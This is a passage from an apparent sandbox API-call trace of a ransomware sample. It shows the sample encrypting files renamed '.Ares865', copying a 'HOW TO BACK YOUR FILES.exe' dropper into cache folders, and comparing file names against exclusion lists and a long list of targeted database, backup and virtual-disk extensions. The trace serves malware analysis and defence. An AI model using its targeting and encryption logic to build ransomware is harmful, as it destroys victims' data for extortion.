Files\\Content.IE5\\X9OHK109\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0060.469] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.469] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0060.469] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.469] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0060.470] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0060.470] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0060.470] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.470] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.470] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x164 [0060.473] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0060.474] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0060.475] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0060.475] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0060.475] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0060.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.475] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.475] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.475] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.476] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0060.476] CloseHandle (hObject=0x164) returned 1 [0060.476] CloseHandle (hObject=0x15c) returned 1 [0060.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0060.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.477] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a4e2660, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.477] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.477] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a4e2660, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0060.478] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0060.478] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2248 [0060.478] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0060.478] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2870 | out: hHeap=0x2b0000) returned 1 [0060.478] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0060.478] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned 82 [0060.478] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0060.478] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.478] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.478] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.478] GetLastError () returned 0x0 [0060.478] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.478] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.479] CloseHandle (hObject=0x12c) returned 1 [0060.479] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.479] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.479] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0060.479] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.479] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.479] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.479] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.479] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.479] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.479] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.479] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.479] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e5e3095, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0060.479] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.479] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0060.479] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0060.479] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0060.479] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0060.479] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0060.479] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0060.479] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0060.479] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0060.479] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0060.479] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0060.479] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0060.479] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0060.479] lstrlenW (lpString="desktop.ini") returned 11 [0060.479] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*") returned 84 [0060.479] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0060.480] lstrlenW (lpString="desktop.ini") returned 11 [0060.480] lstrlenW (lpString="Ares865") returned 7 [0060.480] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0060.480] lstrlenW (lpString=".dll") returned 4 [0060.480] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0060.480] lstrlenW (lpString=".lnk") returned 4 [0060.480] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0060.480] lstrlenW (lpString=".ini") returned 4 [0060.480] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0060.480] lstrlenW (lpString=".sys") returned 4 [0060.480] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0060.480] lstrlenW (lpString="desktop.ini") returned 11 [0060.480] lstrlenW (lpString="bak") returned 3 [0060.480] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0060.480] lstrlenW (lpString="ba_") returned 3 [0060.480] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0060.480] lstrlenW (lpString="dbb") returned 3 [0060.480] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0060.480] lstrlenW (lpString="vmdk") returned 4 [0060.480] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0060.480] lstrlenW (lpString="rar") returned 3 [0060.480] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0060.480] lstrlenW (lpString="zip") returned 3 [0060.480] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0060.480] lstrlenW (lpString="tgz") returned 3 [0060.480] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0060.480] lstrlenW (lpString="vbox") returned 4 [0060.480] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0060.480] lstrlenW (lpString="vdi") returned 3 [0060.480] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0060.480] lstrlenW (lpString="vhd") returned 3 [0060.480] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0060.480] lstrlenW (lpString="vhdx") returned 4 [0060.480] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0060.480] lstrlenW (lpString="avhd") returned 4 [0060.480] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0060.480] lstrlenW (lpString="db") returned 2 [0060.480] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0060.480] lstrlenW (lpString="db2") returned 3 [0060.481] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0060.481] lstrlenW (lpString="db3") returned 3 [0060.481] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0060.481] lstrlenW (lpString="dbf") returned 3 [0060.481] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0060.481] lstrlenW (lpString="mdf") returned 3 [0060.481] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0060.481] lstrlenW (lpString="mdb") returned 3 [0060.481] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0060.481] lstrlenW (lpString="sql") returned 3 [0060.481] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0060.481] lstrlenW (lpString="sqlite") returned 6 [0060.481] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0060.481] lstrlenW (lpString="sqlite3") returned 7 [0060.481] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0060.481] lstrlenW (lpString="sqlitedb") returned 8 [0060.481] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0060.481] lstrlenW (lpString="xml") returned 3 [0060.481] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0060.481] lstrlenW (lpString="$er") returned 3 [0060.481] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0060.481] lstrlenW (lpString="4dd") returned 3 [0060.481] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0060.481] lstrlenW (lpString="4dl") returned 3 [0060.481] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0060.481] lstrlenW (lpString="^^^") returned 3 [0060.481] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0060.481] lstrlenW (lpString="abs") returned 3 [0060.481] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0060.481] lstrlenW (lpString="abx") returned 3 [0060.481] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0060.481] lstrlenW (lpString="accdb") returned 5 [0060.481] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0060.481] lstrlenW (lpString="accdc") returned 5 [0060.481] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0060.481] lstrlenW (lpString="accde") returned 5 [0060.481] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0060.481] lstrlenW (lpString="accdr") returned 5 [0060.482] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0060.482] lstrlenW (lpString="accdt") returned 5 [0060.482] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0060.482] lstrlenW (lpString="accdw") returned 5 [0060.482] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0060.482] lstrlenW (lpString="accft") returned 5 [0060.482] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0060.482] lstrlenW (lpString="adb") returned 3 [0060.482] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.482] lstrlenW (lpString="adb") returned 3 [0060.482] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.482] lstrlenW (lpString="ade") returned 3 [0060.482] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0060.482] lstrlenW (lpString="adf") returned 3 [0060.482] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0060.482] lstrlenW (lpString="adn") returned 3 [0060.482] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0060.482] lstrlenW (lpString="adp") returned 3 [0060.482] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0060.482] lstrlenW (lpString="alf") returned 3 [0060.482] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0060.482] lstrlenW (lpString="ask") returned 3 [0060.482] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0060.482] lstrlenW (lpString="btr") returned 3 [0060.482] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0060.482] lstrlenW (lpString="cat") returned 3 [0060.482] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0060.482] lstrlenW (lpString="cdb") returned 3 [0060.482] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0060.482] lstrlenW (lpString="ckp") returned 3 [0060.482] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0060.482] lstrlenW (lpString="cma") returned 3 [0060.482] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0060.482] lstrlenW (lpString="cpd") returned 3 [0060.482] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0060.482] lstrlenW (lpString="dacpac") returned 6 [0060.482] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0060.482] lstrlenW (lpString="dad") returned 3 [0060.483] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0060.483] lstrlenW (lpString="dadiagrams") returned 10 [0060.483] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0060.483] lstrlenW (lpString="daschema") returned 8 [0060.483] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0060.483] lstrlenW (lpString="db-journal") returned 10 [0060.483] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0060.483] lstrlenW (lpString="db-shm") returned 6 [0060.483] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0060.483] lstrlenW (lpString="db-wal") returned 6 [0060.483] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0060.483] lstrlenW (lpString="dbc") returned 3 [0060.483] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0060.483] lstrlenW (lpString="dbs") returned 3 [0060.483] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0060.483] lstrlenW (lpString="dbt") returned 3 [0060.483] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0060.483] lstrlenW (lpString="dbv") returned 3 [0060.483] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0060.483] lstrlenW (lpString="dbx") returned 3 [0060.483] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0060.483] lstrlenW (lpString="dcb") returned 3 [0060.483] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0060.483] lstrlenW (lpString="dct") returned 3 [0060.483] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0060.483] lstrlenW (lpString="dcx") returned 3 [0060.483] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0060.483] lstrlenW (lpString="ddl") returned 3 [0060.483] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0060.483] lstrlenW (lpString="dlis") returned 4 [0060.483] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0060.483] lstrlenW (lpString="dp1") returned 3 [0060.483] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0060.483] lstrlenW (lpString="dqy") returned 3 [0060.483] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0060.483] lstrlenW (lpString="dsk") returned 3 [0060.483] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0060.483] lstrlenW (lpString="dsn") returned 3 [0060.484] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0060.484] lstrlenW (lpString="dtsx") returned 4 [0060.484] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0060.484] lstrlenW (lpString="dxl") returned 3 [0060.484] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0060.484] lstrlenW (lpString="eco") returned 3 [0060.484] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0060.484] lstrlenW (lpString="ecx") returned 3 [0060.484] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0060.484] lstrlenW (lpString="edb") returned 3 [0060.484] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0060.484] lstrlenW (lpString="epim") returned 4 [0060.484] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0060.484] lstrlenW (lpString="fcd") returned 3 [0060.484] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0060.484] lstrlenW (lpString="fdb") returned 3 [0060.484] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0060.484] lstrlenW (lpString="fic") returned 3 [0060.484] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0060.484] lstrlenW (lpString="flexolibrary") returned 12 [0060.484] lstrlenW (lpString="fm5") returned 3 [0060.484] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0060.484] lstrlenW (lpString="fmp") returned 3 [0060.484] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0060.484] lstrlenW (lpString="fmp12") returned 5 [0060.484] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0060.484] lstrlenW (lpString="fmpsl") returned 5 [0060.484] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0060.484] lstrlenW (lpString="fol") returned 3 [0060.484] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0060.484] lstrlenW (lpString="fp3") returned 3 [0060.484] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0060.484] lstrlenW (lpString="fp4") returned 3 [0060.484] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0060.484] lstrlenW (lpString="fp5") returned 3 [0060.484] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0060.484] lstrlenW (lpString="fp7") returned 3 [0060.484] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0060.485] lstrlenW (lpString="fpt") returned 3 [0060.485] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0060.485] lstrlenW (lpString="frm") returned 3 [0060.485] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0060.485] lstrlenW (lpString="gdb") returned 3 [0060.485] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.485] lstrlenW (lpString="gdb") returned 3 [0060.485] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.485] lstrlenW (lpString="grdb") returned 4 [0060.485] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0060.485] lstrlenW (lpString="gwi") returned 3 [0060.485] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0060.485] lstrlenW (lpString="hdb") returned 3 [0060.485] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0060.485] lstrlenW (lpString="his") returned 3 [0060.485] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0060.485] lstrlenW (lpString="ib") returned 2 [0060.485] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0060.485] lstrlenW (lpString="idb") returned 3 [0060.485] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0060.485] lstrlenW (lpString="ihx") returned 3 [0060.485] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0060.485] lstrlenW (lpString="itdb") returned 4 [0060.485] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0060.485] lstrlenW (lpString="itw") returned 3 [0060.485] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0060.485] lstrlenW (lpString="jet") returned 3 [0060.485] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0060.485] lstrlenW (lpString="jtx") returned 3 [0060.485] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0060.485] lstrlenW (lpString="kdb") returned 3 [0060.485] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0060.485] lstrlenW (lpString="kexi") returned 4 [0060.485] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0060.485] lstrlenW (lpString="kexic") returned 5 [0060.485] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0060.485] lstrlenW (lpString="kexis") returned 5 [0060.485] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0060.486] lstrlenW (lpString="lgc") returned 3 [0060.486] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0060.486] lstrlenW (lpString="lwx") returned 3 [0060.486] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0060.486] lstrlenW (lpString="maf") returned 3 [0060.486] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0060.486] lstrlenW (lpString="maq") returned 3 [0060.486] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0060.486] lstrlenW (lpString="mar") returned 3 [0060.486] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0060.486] lstrlenW (lpString="marshal") returned 7 [0060.486] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0060.486] lstrlenW (lpString="mas") returned 3 [0060.486] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0060.486] lstrlenW (lpString="mav") returned 3 [0060.486] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0060.486] lstrlenW (lpString="maw") returned 3 [0060.486] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0060.486] lstrlenW (lpString="mdbhtml") returned 7 [0060.486] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0060.486] lstrlenW (lpString="mdn") returned 3 [0060.486] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0060.486] lstrlenW (lpString="mdt") returned 3 [0060.486] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0060.486] lstrlenW (lpString="mfd") returned 3 [0060.486] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0060.486] lstrlenW (lpString="mpd") returned 3 [0060.486] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0060.486] lstrlenW (lpString="mrg") returned 3 [0060.486] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0060.486] lstrlenW (lpString="mud") returned 3 [0060.486] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0060.486] lstrlenW (lpString="mwb") returned 3 [0060.486] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0060.486] lstrlenW (lpString="myd") returned 3 [0060.486] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0060.486] lstrlenW (lpString="ndf") returned 3 [0060.486] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0060.487] lstrlenW (lpString="nnt") returned 3 [0060.487] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0060.487] lstrlenW (lpString="nrmlib") returned 6 [0060.487] 